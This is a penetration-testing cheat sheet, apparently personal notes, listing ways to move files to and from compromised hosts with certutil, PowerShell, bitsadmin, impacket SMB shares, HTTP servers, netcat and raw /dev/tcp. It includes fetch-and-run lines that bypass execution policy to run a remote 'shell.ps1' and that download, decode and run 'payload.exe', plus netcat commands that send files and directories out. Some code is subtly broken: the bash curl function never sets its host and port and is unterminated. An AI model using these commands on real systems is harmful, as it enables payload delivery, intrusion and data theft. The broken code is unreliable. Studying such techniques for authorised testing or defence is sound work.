share files
certutil.exe -urlcache [-split] -f <source> <destn>
powershell wget <source> -OutFile <dest>
powershell Invoke-WebRequest -Uri <source> -Outfile <dest>
powershell -c (New-Object System.Net.WebClient).downloadFile('SOURCE', 'DESTN')
powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('/shell.ps1')
certutil.exe -urlcache -split -f <source> payload.b64 & certutil.exe -decode payload.b64 payload.exe & payload.exe
bitsadmin /transfer job <source> <dest>
# SMB Server
impacket-smbserver [-smb2support] drive . [-user kashz -password kashz]
# on windows to copy (download)
copy \\IP\drive\FILE
# upload
copy FILE \\IP\drive\
# mount smb-share-drive on windows using powershell
$pass = convertto-securestring 'kashz' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kashz',$pass)
New-PSDrive -Name "kashz" -PSProvider "FileSystem" -Credential $cred -Root "\\IP\drive"
cd kashz:
# hosted files are here.
# upload dir (with all in it)
robocopy dir \\IP\drive\ /E
net use Z: \\IP\drive /u:USER PASS
copy file Z:\
HTTP Server
Alternative: sc0tfree/updog
python3 -m http.server 80
python2 -m SimpleHttpSever 80
php -S IP:PORT
wget <IP>:<PORT>/<file> -O <file>
curl <IP>:<PORT>/<file> -o <file>
scp file kashz@IP:/PATH/FILE
# download all files
wget -r <IP>:<PORT>/<DIR>/
# using base64
base64 <executable> > out
base64 -d out > <executable>
# receiver
nc -l -p <PORT> > out.file
# sender
nc -w 3 <IP> <PORT> < in.file
# receiver
nc -l -p 1234 | uncompress -c | tar xvfp -
# sender
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
# pip install wsgidav cheroot
mkdir /tmp/kashz; wsgidav --host=IP --port=80 --root=/tmp/kashz
# windows
net use * http://IP/
Curl function (linux only)
Use when system does not have wget, curl.
NOTE: works for binary files too. Fails for https://
with self signed certificates.
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
# usage
__curl http://IP/FILE > out
Last updated
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